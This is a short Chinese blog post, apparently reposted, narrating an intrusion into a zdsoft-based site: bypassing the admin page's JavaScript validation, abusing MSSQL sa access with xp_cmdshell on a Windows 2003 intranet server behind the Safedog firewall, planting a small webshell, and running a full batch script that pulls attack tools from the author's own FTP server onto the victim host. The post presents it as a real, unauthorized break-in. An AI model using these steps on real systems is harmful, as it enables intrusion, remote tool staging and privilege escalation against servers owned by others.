菊花品牌:zdsoft。
菊花位置:http://www.xxx.com/Admin/sqlPlatform/operateSql.aspx(关闭js,绕过验证)。
windows2003内网+mssql+dog。
mssql,sa用户权限支持xp_cmdshell。
有狗,没有过狗的菜刀。
拿不了webshell,不过上了个小马。
从xp_cmdshell开始:
因为是内网,所以先要转发,需要上传工具。
难点:怎么上传工具,cmd没有wget。
我想到ftp。找台服务器(我自己买了个vps),开了ftp,写个bat(网上找的):
@echo off
rem 指定FTP用户名
set ftpUser=FTPUSERNAME
rem 指定FTP密码
set ftpPass=FTPPASSWORD
rem 指定FTP服务器地址
set ftpIP=192.168.0.2
rem 指定待下载的文件位于FTP服务器的哪个目录
set ftpFolder=d:/ftp
rem 指定从FTP下载下来的文件存放到本机哪个目录
set LocalFolder=C:/temp
set ftpFile=%temp%/TempFTP.txt
>"%ftpFile%" (
echo,%ftpUser%
echo,%ftpPass%
echo cd "%ftpFolder%"
echo lcd "%LocalFolder%"
echo bin
echo mget *.*
echo bye
)
start ftp -v -i -s:"%ftpFile%" %ftpIP%
运行后会将ftp服务器d:/ftp下的所有文件下载到本地c:/temp中。
将mget *.*改为get xxx.txt就会单个下载。
都设置了下,利用小马写到网站里, cmd下运行,成功了,如图:
服务器图片就不穿了,怕被爆菊花。
写的时候好简单,几分钟写完了,单真真实际操作了的时候有很多困难,只是克服了,所以觉得简单。这可是我从12点到4点才搞成功的,如图:
【全文完】责任编辑:游风 责任主编:redrain
转载请注明:jinglingshu的博客 » 绕过安全狗提权